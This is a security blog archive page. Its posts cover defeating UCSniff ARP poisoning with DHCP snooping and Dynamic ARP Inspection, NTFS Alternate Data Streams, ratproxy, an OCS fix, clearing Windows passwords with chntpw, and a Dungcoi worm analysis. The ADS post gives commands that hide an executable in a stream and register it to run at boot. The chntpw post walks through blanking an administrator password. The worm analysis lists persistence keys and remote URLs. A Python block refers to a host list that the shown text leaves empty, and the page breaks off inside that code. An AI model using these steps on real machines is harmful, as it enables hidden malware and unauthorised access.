17 Dec 2009

Defeating UCSniff

Author: Abhijeet | Filed under: HOWTO's, Security Tools, Voice Over IP

If one asks VoIP vendors about their biggest security risk, the obvious answer would be eavesdropping. It’s a breach in confidentiality of the communication and can cause huge business impact.

Unified Communications Sniffer (UCSniff) is a next generation VoIP sniffing tool from VIPER Lab. It can detect and sniff ongoing audio/video call sessions between IP phones and store the media in .wav and .264 files. It can also capture voicemail PIN codes and alter phone settings.

Considering eavesdropping as one of the biggest threats to VoIP networks, UCSniff can be extremely dangerous and every attacker would want to have it in his arsenal. UCSniff supports automatic recording and saving of conversations using the G.722, G.729, G.726 and G.723 codecs. Its latest version can intercept H.264 video traffic too. Wireshark can also decode and store the VoIP payload and create an audio file out of it, but that is a tedious process if multiple calls are involved in the packet capture. UCSniff makes all this very simple.

These are some of the implications of tools like UCSniff. But how do we protect our network from it and mitigate the risk? This is what the post is all about: Defeating UCSniff ;) The security measures explained here can also be used to defeat similar tools like VideoJak, Cain and Abel etc.

Before we delve into mitigation techniques, I would like to brief you about UCSniff and its architecture. UCSniff is nothing but a stripped-down version of Ettercap with VoIP protocol dissectors. Ettercap is a well known multipurpose sniffer and logging utility for switched LANs. It is also used to implement MITM attacks in networked environments. Ettercap has different interfaces, viz. Text, Ncurses and GTK. UCSniff has removed the Ncurses and GTK display interfaces along with most of the protocol dissectors and plugins.

Lab Network

So the key essence of UCSniff is ARP poisoning. It performs the Man-In-The-Middle (MITM) attack using the ARP poisoning techniques of Ettercap and sniffs/dumps the VoIP calls. So, in order to defeat UCSniff, the network admin needs to protect the network from ARP poisoning attacks.

I am going to show you a few techniques that can be used to defeat UCSniff and similar tools based on ARP poisoning.

I have a small VoIP lab consisting of a Cisco Catalyst 3560 series switch along with 4 VoIP phones. Two of them have video capabilities. All phones are registered with a sipXecs server, an open source IP PBX.

UCSniff in action

Let’s run UCSniff without any ARP protection and see the impact on audio/video conversations.

The adjacent screenshot shows UCSniff eavesdropping on a VoIP audio/video call using its Live Monitor feature, dumping the audio and video into .wav and .avi files respectively.

The screenshot also shows the number of hosts enumerated by UCSniff.

Keep a note of this number; we will need it afterwards. We just saw how easily UCSniff can spy on our calls.

Before we do any security configurations on our Cisco 3560 switch, let me brief you about the security features which we will be using to prevent ARP attacks.

  1. DHCP Snooping
  2. Dynamic ARP Inspection (DAI)

DHCP Snooping:

DHCP Snooping Configuration

DHCP snooping is a DHCP security feature that provides security by filtering untrusted DHCP messages and by building and maintaining a DHCP snooping binding table.

An untrusted message is one that is received from outside the network or firewall and that can cause traffic attacks within your network. DHCP snooping acts like a firewall between untrusted hosts and DHCP servers.

DHCP snooping classifies interfaces as either trusted or untrusted. DHCP messages received on trusted interfaces are permitted to pass through the Cisco switch, but DHCP messages received on an untrusted interface result in the switch putting that interface into the error-disabled state.

Let’s enable DHCP Snooping security feature for VLAN 20 on my lab switch.

The following screenshot shows the DHCP snooping binding database with 2 entries for my Grandstream phones.

DHCP Snooping binding table

The DHCP snooping binding table contains the MAC address, IP address, lease time, binding type, VLAN number and interface information that corresponds to the local untrusted interfaces of a switch; it does not contain information about hosts connected to a trusted interface.

Dynamic ARP Inspection (DAI):

DAI is a security feature that validates ARP packets in a network. DAI intercepts, logs, and discards ARP packets with invalid IP-to-MAC address bindings. This capability protects the network from some Man-in-the-middle attacks. DAI ensures that only valid ARP requests and responses are relayed.

When DAI is enabled, the switch performs these activities:

  • Intercepts all ARP requests and responses on untrusted ports
  • Verifies that each of these intercepted packets has a valid IP-to-MAC address binding before updating the local ARP cache or before forwarding the packet to the appropriate destination
  • Drops invalid ARP packets

DAI determines the validity of an ARP packet based on valid IP-to-MAC address bindings stored in the DHCP snooping binding database. If the ARP packet is received on a trusted Interface, the switch forwards the packet without any checks. On untrusted interfaces, the switch forwards the packet only if it is valid.

DAI associates a trust state with each interface on the switch. Packets arriving on trusted interfaces bypass all DAI validation checks, and those arriving on untrusted interfaces undergo the DAI validation process.

The following screenshot shows the Dynamic ARP Inspection configuration on my lab switch.

In a typical network configuration, you configure all switch ports connected to host ports as untrusted and configure all switch ports connected to switches as trusted. With this configuration, all ARP packets entering the network from a given switch bypass the security check. By default all the switch ports are configured as untrusted.

With these security measures in place, let’s run UCSniff again and see the result.

I have plugged my laptop into switch port Fa0/3 with IP address 172.16.20.7.

The above screenshot shows that UCSniff was able to detect only one host, which is the gateway. Why did this happen?

DAI console logs

Let’s have a look at the adjacent switch console.

Note the line “%SW_DAI-4-PACKET_RATE_EXCEEDED:” in the console log screenshot above. It also shows an ARP inspection error detected on interface Fa0/3; its link state changed to down and my laptop was kicked off the network. This happened because of the rate limiting module of the DAI feature.

DAI disabled the source switch port of the ARP scan

Rate Limiting of ARP Packets:

The switch rate-limits the incoming ARP packets on which it performs DAI validation checks, to prevent a denial-of-service attack. By default, the rate for untrusted interfaces is 15 packets per second (pps).

Trusted interfaces are not rate limited. You can change this setting by using the “ip arp inspection limit” interface configuration command.

When the rate of incoming ARP packets exceeds the configured limit, the switch places the port in the error-disabled state. The port remains in that state until you intervene.

I plugged my laptop into Fa0/4 and Fa0/5, ran UCSniff and got similar results. The following screenshot shows the status of all the switch interfaces from which I ran UCSniff.

Now the obvious question is: the rate limiting module will defeat UCSniff, but what about tools which perform ARP poisoning slowly and do not scan for target hosts?

Let’s try this scenario and poison a single host by sending fake ARP request/reply packets. As ARP poisoning a single host needs only 2 spoofed ARP packets, the rate limiting module will not trigger and we should be able to get around the DAI feature, right? But it failed again :) How? Let’s check the switch console in the following screenshots.

Error logs by DHCP Snooping

The line “%SW_DAI-4-DHCP_SNOOPING_DENY” in the screenshot explains everything. When we send an ARP reply with a spoofed MAC address, the switch checks the ARP packet against the DHCP snooping binding table and drops the packet because the MAC/IP pair does not match the table entries, defeating the ARP attack.

You can use the “errdisable recovery” global configuration command to enable error-disable recovery so that ports automatically emerge from this state after a specified timeout period. The adjacent screenshot shows how you can use the “errdisable recovery cause” global configuration command to re-enable error-disabled ports after a specified timeout period.
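To make the two switch behaviours seen above concrete (the ARP rate limit that err-disables the port during the host scan, and the DHCP snooping binding check that denies the slow, two-packet poison), here is a small simulation. It is an added example, not code from the post or from Cisco: the port names, MAC addresses, bindings and packet timings are constructed, and the log strings only mirror the %SW_DAI-4-* messages shown on the lab console.

```python
"""Model of Dynamic ARP Inspection: per-port ARP rate limiting plus a
sender IP/MAC check against the DHCP snooping binding table."""
from collections import deque
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpPacket:
    ingress_port: str
    sender_mac: str
    sender_ip: str
    timestamp: float          # seconds since the capture started


@dataclass
class Port:
    trusted: bool = False
    rate_limit_pps: int = 15  # Cisco default for untrusted interfaces
    err_disabled: bool = False
    recent: deque = field(default_factory=deque)  # ARP arrival times, last second


class DaiSwitch:
    def __init__(self, ports):
        self.ports = ports
        self.bindings = {}    # DHCP snooping table: IP -> MAC (untrusted ports only)
        self.log = []

    def learn_dhcp_binding(self, ip, mac):
        self.bindings[ip] = mac.lower()

    def errdisable_recover(self, port_name):
        """What 'errdisable recovery cause arp-inspection' does after its timeout."""
        port = self.ports[port_name]
        port.err_disabled = False
        port.recent.clear()

    def handle_arp(self, pkt):
        port = self.ports[pkt.ingress_port]
        if port.err_disabled:
            return "dropped (port err-disabled)"
        if port.trusted:
            return "forwarded (trusted port, no check)"
        # 1. Rate limiting: count ARP packets seen on this port in the last second.
        window = port.recent
        window.append(pkt.timestamp)
        while window and pkt.timestamp - window[0] >= 1.0:
            window.popleft()
        if len(window) > port.rate_limit_pps:
            port.err_disabled = True
            self.log.append(f"%SW_DAI-4-PACKET_RATE_EXCEEDED: {len(window)} packets "
                            f"received in 1000 milliseconds on {pkt.ingress_port}")
            return "dropped (rate limit exceeded, port err-disabled)"
        # 2. Binding check: sender IP/MAC must match a DHCP snooping entry.
        if self.bindings.get(pkt.sender_ip) != pkt.sender_mac.lower():
            self.log.append(f"%SW_DAI-4-DHCP_SNOOPING_DENY: Invalid ARPs on "
                            f"{pkt.ingress_port}, sender {pkt.sender_mac}/{pkt.sender_ip}")
            return "dropped (invalid IP-to-MAC binding)"
        return "forwarded"


LAPTOP_MAC = "00:1c:c4:cc:cc:cc"  # constructed MAC for the laptop on Fa0/3


def build_lab_switch():
    """Uplink trusted, phone/laptop ports untrusted, bindings as DHCP would build them."""
    sw = DaiSwitch({"Gi0/1": Port(trusted=True),
                    "Fa0/1": Port(), "Fa0/2": Port(), "Fa0/3": Port()})
    sw.learn_dhcp_binding("172.16.20.10", "00:0b:82:aa:aa:aa")  # constructed phone A
    sw.learn_dhcp_binding("172.16.20.11", "00:0b:82:bb:bb:bb")  # constructed phone B
    sw.learn_dhcp_binding("172.16.20.7", LAPTOP_MAC)            # laptop, 172.16.20.7
    return sw


def run_host_scan(sw, port="Fa0/3", hosts=50):
    """Scenario 1: a rapid ARP sweep for host discovery, one request every 10 ms.
    The sender binding is valid, so only the rate limit can stop it."""
    return [sw.handle_arp(ArpPacket(port, LAPTOP_MAC, "172.16.20.7", i * 0.01))
            for i in range(hosts)]


def run_slow_poison(sw, port="Fa0/3"):
    """Scenario 2: two spoofed replies, seconds apart, claiming the gateway's IP.
    The gateway sits behind the trusted uplink, so no binding exists for it."""
    return [sw.handle_arp(ArpPacket(port, LAPTOP_MAC, "172.16.20.1", t))
            for t in (0.0, 5.0)]


if __name__ == "__main__":
    sw = build_lab_switch()
    print(run_host_scan(sw)[14:17], sw.log)
    sw = build_lab_switch()
    print(run_slow_poison(sw), sw.log)
```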

Recover ports disabled by DAI

Other Prevention techniques:

Though ARP attacks are dangerous and can cause dire results, Dynamic ARP Inspection can easily defeat such attacks and ensure that our mission-critical communications and systems are protected.

SOHO administrators can also make use of open source tools like ArpON (http://arpon.sourceforge.net) to protect their systems from ARP poisoning attacks.

ArpON (ARP handler inspectiON) is a portable handler daemon with some nice tools to handle all ARP aspects. It has lots of features and it makes ARP a bit safer. This is possible using two kinds of anti ARP poisoning techniques: the first is based on SARPI or “Static ARP Inspection”, the second on the DARPI or “Dynamic ARP Inspection” approach.

As ArpON is not ported to embedded devices like routers and phones, it’s more of a host-based solution. Read more about it in the references.

Another Linux kernel module, ARP* (ARP Star), can also be used on your Linux gateway to detect and prevent ARP poisoning attacks.

This project is coded in C and is available as a module for the 2.6 Linux kernel series. The only libraries needed are included in the Linux kernel. It has also been ported to the Linksys WRT54G.

I have not played with these tools yet, but down the line I will surely write a post on both of them. Till then stay SAFE :)

Though the implications of tools attacking Layer 2 are dire, prevention mechanisms are quite simple and effective.

“Security is more than designing strong cryptography into a system; it’s designing the entire system such that all security measures, including cryptography, work together.” — Bruce Schneier


References:

With the introduction of the NTFS file system in Windows NT, Microsoft introduced the new concept of having multiple streams in a single file, known as Alternate Data Streams (ADS). In this blog I will discuss some advantages and disadvantages of ADS.
Whenever we perform any operation on a file, like reading, writing or editing, we do it on the main stream of the file. An alternate data stream can hold binary or ASCII data. We can attach streams to any file, including executables and folders.

The biggest advantage of ADS is that it is invisible by default to the file handling utilities provided by Microsoft Windows, like File Explorer and the dir command. Unlike steganography, adding an alternate stream to a file does not affect its original size, which makes it almost impossible to detect.

The ADS capability was originally introduced for compatibility with the Hierarchical File System (HFS), where data sometimes gets forked into separate resources. ADS are used by many legitimate Windows programs to store file information such as attributes and temporary storage.
Virus writers can take advantage of this stealth functionality provided by ADS to hide malicious data in an alternate stream attached to legitimate files and easily defeat normal users and most of the antivirus products out there.

How to create an ADS:
===============
The following command creates hiddenFile.txt as an ADS on the explorer.exe file present in %SystemRoot%:
c:\>echo "This is confidential data." >c:\windows\explorer.exe:hiddenFile.txt

The following command lets you read the data present in the ADS. If you check the size of explorer.exe after attaching the alternate stream, it will be exactly the same.

c:\>type c:\windows\explorer.exe:hiddenFile.txt
This is confidential data.
c:\>

Attaching executable as an ADS:
=======================
You can even attach executables using ADS, and believe me, this is where ADS is a boon for virus writers. Virus writers can attach a malicious executable to a legitimate one and make it execute at every boot.

C:\>copy %SystemRoot%\system32\calc.exe c:\blog\ads\
C:\>type maliciousFile.exe > c:\blog\ads\calc.exe:newCalc.exe
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v newLiveUpdate /t REG_SZ /d C:\blog\ads\calc.exe:newCalc.exe

Once these three commands are executed on the victim machine, the program newCalc.exe will automatically get executed on every boot.
To test it, you will need to reboot your system once.

The above steps are very simple and do not require any skills; this is what makes it so dangerous. A virus writer can hide most of the virus code in an ADS and keep only a small executable that extracts the virus.
Whatever we have discussed till now can be considered the ugly side (for us) of ADS. Now let’s focus on the removal of ADS from infected systems.

How to detect ADS:
==============
Unfortunately, there is no Windows tool which will scan a file and tell you about the alternate streams attached to it.
There is a third party utility called lads.exe which you can use to manually scan files for the presence of ADS. You can download this tool from http://www.heysoft.de

Manually scan the following registry locations using the regedit tool for strings containing “:”, e.g. c:\windows\explorer.exe:virus.exe

Always be suspicious of entries in the above locations and delete unwanted entries like the one given in the above example.
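One way to automate the registry check described above, as an added example that is not part of the original post: a path whose last component contains a second “:” (after the drive letter) is an ADS reference, so any autorun value pointing at one is worth a look. The sample Run entries are constructed; the newLiveUpdate one mirrors the reg add command shown earlier.

```python
"""Flag autorun (Run key) entries whose command line points at an ADS."""
import re
import sys

# After the drive letter's own "X:\", a further ':' in a component that holds
# no backslash is an ADS separator, e.g. C:\blog\ads\calc.exe:newCalc.exe
ADS_PATH_RE = re.compile(r'(?i)\b([a-z]:\\[^:"\s]*?):([^\\/:"\s]+)(?::\$DATA)?')


def find_ads_references(command_line):
    """Return (host_file, stream_name) pairs referenced in a command line."""
    return [(m.group(1), m.group(2)) for m in ADS_PATH_RE.finditer(command_line)]


def audit_autorun_entries(entries):
    """entries: iterable of (key_path, value_name, data). Returns the suspicious ones."""
    findings = []
    for key, name, data in entries:
        for host, stream in find_ads_references(str(data)):
            findings.append({"key": key, "value": name,
                             "host_file": host, "stream": stream})
    return findings


def read_run_entries_windows():
    """Collect HKLM/HKCU Run values on a Windows host (returns [] elsewhere)."""
    if sys.platform != "win32":
        return []
    import winreg  # standard library, Windows only
    entries = []
    key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE),
                            ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            key = winreg.OpenKey(hive, key_path)
        except OSError:
            continue
        with key:
            i = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:
                    break  # no more values
                entries.append((hive_name + "\\" + key_path, name, data))
                i += 1
    return entries


# Constructed sample: one benign entry, one ADS-backed entry, one URL argument
# (the URL's "http:" must not be mistaken for a stream separator).
SAMPLE_RUN_ENTRIES = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "ctfmon",
     r"C:\WINDOWS\system32\ctfmon.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "newLiveUpdate",
     r"C:\blog\ads\calc.exe:newCalc.exe"),
    (r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "updater",
     r'"C:\Program Files\Updater\updater.exe" /url http://updates.example.test'),
]

if __name__ == "__main__":
    entries = read_run_entries_windows() or SAMPLE_RUN_ENTRIES
    for f in audit_autorun_entries(entries):
        print(f"{f['key']}\\{f['value']} -> {f['host_file']} : {f['stream']}")
```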

Let’s look at the good side of ADS. We can use this invisibility feature of ADS for many different purposes.
1) We can attach confidential files, or files which we don’t want to get deleted accidentally, to system files which usually nobody deletes. This is especially useful when a system is shared between multiple users.
2) We can store passwords and PIN codes in ADS.
3) You can use the freeware “Xidie Security Suite” to keep your private data hidden using ADS. You can download this tool from http://www.xidie.ro

How to Delete already created ADS:
========================
As we have already seen, ADS is only supported on the NTFS file system. So moving a file with an ADS to a drive formatted with FAT will remove the ADS present on the moved file.
On the NTFS file system, go to Start -> Run and type “notepad <path of ADS>”

e.g. notepad c:\blog\ads\test.txt:hiddenFile.txt
and delete the complete content of the file and save it.

As of now there are very few viruses which exploit this ADS functionality, but don’t be surprised if you see more of them in the near future, as most current antivirus products are not capable of detecting a virus hidden inside an ADS.

Originally posted 2008-06-07 17:59:27. Republished by Blog Post Promoter

On 1st June, Google made its passive web security assessment tool ratproxy open source. Google confirmed that it had been using this tool internally for analyzing interactive, browser-driven interactions. The tool is released under the Apache 2.0 software license.
In spite of being in beta, ratproxy has a lot of features compared to other similar web proxy tools such as WebScarab, Paros, Burp, ProxMon and Pantera.

The official website describes the tool as:
“A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.

Detects and prioritizes broad classes of security problems, such as dynamic cross-site trust model considerations, script inclusion issues, content serving problems, insufficient XSRF and XSS defenses, and much more.

Ratproxy is currently believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.”

Following are some salient features of ratproxy that give it an edge over the others.
1) It does not generate high volumes of attack-simulating traffic.
2) Tests a lot of web 2.0 features, including XSS, CSRF etc.
3) Sniffs content from stylesheets.
4) Supports SSL.
5) Supports proxy chaining.
6) Flash-based XSS detection.
7) Precise reports, etc.

Though the tool is good enough to test for security vulnerabilities in web applications, it should not be considered the sole testing solution. Manual testing and verification of the results must follow after generating the ratproxy report.

More detailed information about the tool can be found here.
Following snapshot shows the report generated by ratProxy.

You can download the tool here.

With the continuous improvement in web 2.0, security professionals need to keep their tools updated, and we all hope ratproxy will stand by us to protect those improvements.

Originally posted 2008-07-08 09:13:13. Republished by Blog Post Promoter

28 Nov 2009

Cannot Synchronize Address Book: Resolved

Author: bughira | Filed under: HOWTO's, OCS, Voice Over IP

Like most users, I too used to get the “Cannot Synchronize Address Book” notification whenever I logged in to my OCS Communicator client. This happens when we do a custom installation of the application and do not configure the optional features, etc.

I used to ignore that notification most of the time, except today. I got irritated by the yellow exclamation mark on the Communicator icon in the system tray and decided to hunt down the problem.
I didn’t do much on my own except follow the paths shown by Google. I searched for a while, went through some forums and fixed the problem(s).

This post is to summarize the working steps gathered from different forums. Following are the steps that i followed in the process.

  • Open the Office Communications Server 2007 management console and expand the server running the Web Components service.
  • From the Available Tasks in the right pane, expand Validation, then select and complete the Web Components Server Validation wizard.
    • If the wizard fails with the connectivity error “Failure [0xC3FC200D] One or more errors were detected.”, then the problem is that the Default Web Site on the Web Components Server is not assigned a valid certificate (or has no certificate at all). Refer here to fix this.
    • If the Validation wizard fails on the GroupExpansion and AddressBookServer configuration, then the problem is that Windows Server 2003 SP1 includes a new security feature named loopback check. The Validation wizard tries to visit the following URLs but fails due to an authentication failure. However, if you visit the same URLs from a system other than the Web Components Server, they work perfectly.
      • https://[ocs_server_pool]/GroupExpansion/Int/service.asmx
      • https://[ocs_server_pool]/Abs/Int/Handler/D-0ba0-0ba2.dabs
    • Microsoft has already documented workarounds for these errors. Follow the references and you are through.
  • Once the problem is resolved you can search for the needed users’ contact details as shown in the following screenshot. I am now happy to see my Communicator free from the yellow exclamation mark :)

References:

  1. Assign Certificate to Default Web Site
  2. Workaround for Loopback Check

Originally posted 2009-03-13 18:54:19. Republished by Blog Post Promoter

Have you ever forgotten your Windows XP or Vista Administrator password? Have you ever re-installed XP just because you forgot your admin password and didn’t know how to reset it? Do you want to reset your friend’s Administrator password?

If your answer to any of the above questions is ‘yes’ then this is the right place for you to get help. In this post I will explain a simple way to reset the password of any user account using a Linux live CD. I will be explaining the password resetting procedure using an Ubuntu live CD. It’s not mandatory to use a live CD; the same steps can be used if you have a dual-boot Linux partition.

Prerequisites:

  • Ubuntu Live CD
  • CD-ROM should be the first option in the target computer’s BIOS boot sequence.

OK, if you have met the above prerequisites, let’s get started. We will be using a small NT password recovery utility, chntpw (change NT password). chntpw contains a simple registry editor which allows us to change bits and bytes.

The default ISO of Ubuntu 9.04 does not contain the chntpw utility. We need to install it explicitly in either of the following ways.

  • $ sudo apt-get install chntpw
  • Manual: if the repository does not have the package.

We need to manually satisfy the dependencies of the chntpw utility by running

Bughira# apt-get install libgcrypt11

Now download the Debian package of the chntpw utility from here and install it using

Bughira:~# dpkg -i chntpw_0.99.5-0+nmu1_i386.deb
Selecting previously deselected package chntpw.
(Reading database ... 129568 files and directories currently installed.)
Unpacking chntpw (from .../chntpw_0.99.5-0+nmu1_i386.deb) ...
Setting up chntpw (0.99.5-0+nmu1) ...
Processing triggers for man-db ...
Bughira:~#

Resetting the password:

  • Mount the windows partition
  • Change the current directory to WINDOWS\system32\config
  • Bughira# chntpw -l SAM  (this lists all the configured users on the target system)
* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 03eb | admin                          | ADMIN  | dis/lock |
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 03ed | ASPNET                         |        |          |
| 01f5 | Guest                          |        | dis/lock |
| 03e8 | HelpAssistant                  |        | dis/lock |
| 03ea | SUPPORT_388945a0               |        | dis/lock |
  • Bughira# chntpw -u Administrator SAM
  • If we do not specify any user account then the Administrator account is selected and the following menu is presented
- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select

Enter ‘1’ as the choice to clear the password and you are done. We can even change the password or promote another user to administrator of the system.

Select: [q] > 1
Password cleared!

Hives that have changed:
 #  Name
 0  </media/disk/WINDOWS/system32/config/SAM>
Write hive files? (y/n) [n] : y
 0  </media/disk/WINDOWS/system32/config/SAM> - OK

Now you can reboot the system and happily log in to your crappy Windows box :D

Enjoy!!

Originally posted 2009-06-16 15:09:40. Republished by Blog Post Promoter

Today, I was sitting in a dark room self-evaluating some things I did in the past couple of months. And I realized my JOB is making me a lazy ass. It’s been a long time since I analyzed any malicious binary. So I decided to pick up a random old malware sample from my 320 GB Western Digital HDD and analyze it.
I remember one of my colleagues had unintentionally uploaded an infected binary file to sourceforge.net a few days back. When we downloaded the infected binary for testing, our Avast antivirus alerted and deleted the file.

That binary file was uploaded to sourceforge from my colleague’s infected desktop. We immediately removed all the files; created new binaries on antivirus protected computer and then uploaded again in our project files directory.

Thank God we decided to test files before announcing the release on mailing lists.

When I tested the infected binary file on one of my test machines, I was shocked to see the infection capacity of a 24 KB virus. This malware is capable of infecting every single executable on the system. It can spread via flash drives and turn infected systems into so-called bots. I must say it’s one of those virus species which needs a complete reformat of the infected hard drive to recover from.

I decided to analyze same infected binary and write a blog post about its analysis.

Let’s get started by booting up my Windows XP SP3 sandbox under VMware. This sandbox is the victim machine, installed with all the tools required for analysis.
OK! I have Avast antivirus installed on my sandbox, but as it detects the malware and cleans it by deletion, I stopped it. I copied the malware tarball under the c:\malware directory and extracted it.
The malware author has changed the default executable icon to the icon of a folder. It’s a simple trick to make the end user double click the binary and launch it into memory.

Malicious Binary File properties

I checked the properties of binary file to gather some information. Adjacent screenshot shows some information about the binary.

Before doing its behavior analysis, I thought of collecting readable strings from the binary. As malware is packed most of the time, it’s difficult to get the actual strings from the binary; many times we end up with harvested strings from the malware. As expected, the output did not reveal any secrets about the malware.
Now is the time to run the malware and note down its behavior. I launched Regmon, Filemon, Process Explorer and Wireshark, then launched the malware by double clicking it.
As soon as the malware got into memory, the following changes were noticed:

  • Spawned 3 different processes:
    1. fun.exe
    2. SVIQ.exe
    3. dc.exe

    Avast Antivirus getting killed

  • Killed Avast antivirus and disabled its update and notification services.
  • Disabled Windows Firewall and its notifications.
  • Killed FileMon and corrupted Process Explorer.
  • Created 7 copies of itself in various locations under the Windows directory, with a folder icon:
    1. c:\Windows\dc.exe
    2. c:\Windows\SVIQ.exe
    3. c:\Windows\help\Other.exe
    4. c:\Windows\inf\Other.exe
    5. c:\Windows\system\fun.exe
    6. c:\windows\system32\WinSit.exe
    7. c:\Windows\system32\config\Win.exe
  • Added itself to the authorized application list under the Windows Firewall configuration.
  • Added itself to load whenever Windows starts:
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\load: "C:\WINDOWS\inf\Other.exe"
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe C:\WINDOWS\system32\WinSit.exe"
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\run: "C:\WINDOWS\system32\config\Win.exe"
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\dc2k5: "C:\WINDOWS\SVIQ.EXE"
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\Fun: "C:\WINDOWS\system\Fun.exe"
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\dc: "C:\WINDOWS\dc.exe"
  • Disabled Windows Task Manager and Registry Editor:
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr: 0x00000001
    HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools: 0x00000001
  • Disabled antivirus notifications and firewall file tracing options:
    HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusDisableNotify: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallDisableNotify: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\UpdatesDisableNotify: 0x00000001
    HKLM\SOFTWARE\Microsoft\Security Center\Svc\UacDisableNotify: 0x00000001
    HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
    HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
    HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000
  • Bypassed the firewall by creating the following registry entry:
    HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\[infected file path]: "[infected file path]:*:Enabled:ipsec"
  • The worm added the following string to the %Windir%\wininit.ini file:
    NUL=C:\WINDOWS\Help\Other.exe
  • The malware also had a buddy system in place: when I tried to kill the parent process, the child process restarted the parent process and vice versa. This way, both were watching each other’s back.

As the malware gets unpacked in memory, strings from memory become valuable assets. I saved a copy of the strings from the malware running in memory and started looking for something interesting. Following are some of the interesting strings.

      Olalala, may tinh cua ban da dinh Worm DungCoi...........
      yahoobuddymain
      yalertclass
      button
      Open
      ymsgr:sendIM?
      yiminputwindow

From above strings, it looks like Malware send “Olalala, may tinh cua ban da dinh Worm DungCoi………..” IM message using yahoo messenger.

New Process Spawned

The presence of the following strings also gives a clue that the malware is packing its payload using the UPX packer.

      !This program cannot be run in DOS mode.
      Richm
      UPX0
      UPX1
      UPX2
      UPX!

These strings can also be decoys (harvested strings) to fool malware analysts. But let’s not ignore them. I installed Yahoo Messenger to confirm my findings. I killed the process tree of the malware, installed Yahoo Messenger, logged in with a dummy account, reinstalled Process Explorer and restarted the malware.

This time other than spawning 3 processes, I found Malware had spawned another process called winbafcra.exe. I located the image path and made a copy of it for further analysis.

Empty IM Popup

While I was copying the binary, all of a sudden I got an empty yahoo messenger pop up from user “dungcoi_vb”. Following screen shot shows the yahoo messenger pop up.

Though I did not get any message in the IM Chat box, screenshot proved my first assumption. This was definitely another variant of Dungcoi virus as it was carrying another virus payload inside it. Now let’s analyze Winbafcra.exe.

Analysis of Winbafcra.exe:

Let’s first find out if this binary is packed, using packer detectors. As expected, PEiD and RDG both detected the binary as packed with the UPX packer. The following screenshot shows PEiD and RDG detecting the UPX packer. I unpacked the binary using the UPX tool as shown in the following screenshot.

RDG: UPX Packer Detected

Unpacking UPX Packer

Following are the details of the findings.

  • The malware is packed with the UPX packer. Once unpacked and launched, it creates a mutex named “S_SERV_v0.66_Beta_erf”.
  • Made an outbound connection to hxxp://parkinglot.information.com
  • Opened TCP ports 25 (SMTP) and 2007

    Socket Connections

  • Tried to access the following host names:

  • Following files were requested from the remote web server.
http://hgfdujt.info/?%x
http://hgfdujt.info/i.php
http://hgfdujt.info/myh.php
http://hgfdujt.info/?4bf55
http://195.24.77.223/utest/?jutr=%d&oo=%d&%x=%x&ra=%d
http://hgfdujt.info/?4f682
http://hgfdujt.info/?50641
http://hgfdujt.info/?53b1c
http://hgfdujt.info/?59cf3
http://hgfdujt.info/?61b6a

The malware tried to set up a mail relay on the infected box and also tried to download a further set of malicious files from the internet.
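The host list above is the classic footprint of a spam bot: it resolves the inbound MX hosts of large providers so it can deliver mail to them directly, it looks itself up in DNS blocklists, and it talks to port 25 from a workstation. The Python below, an added example rather than tooling from the original analysis, turns that into a detection over a constructed DNS/connection log (the host names are copied from the list above; the IP addresses and log format are made up) and flags a machine that shows several of these behaviours together. Real DNSBL lookups carry the reversed IP address as a prefix of the zone, so the classifier matches on the zone suffix only.

```python
import re
from collections import defaultdict

# Registrable domains of the DNS blocklists in the host list above.
DNSBL_ZONES = {"spamhaus.org", "spamcop.net", "abuseat.org", "dsbl.org",
               "njabl.org", "uceb.org", "csma.biz", "wpbl.info"}
# Host labels large providers use for their inbound mail exchangers.
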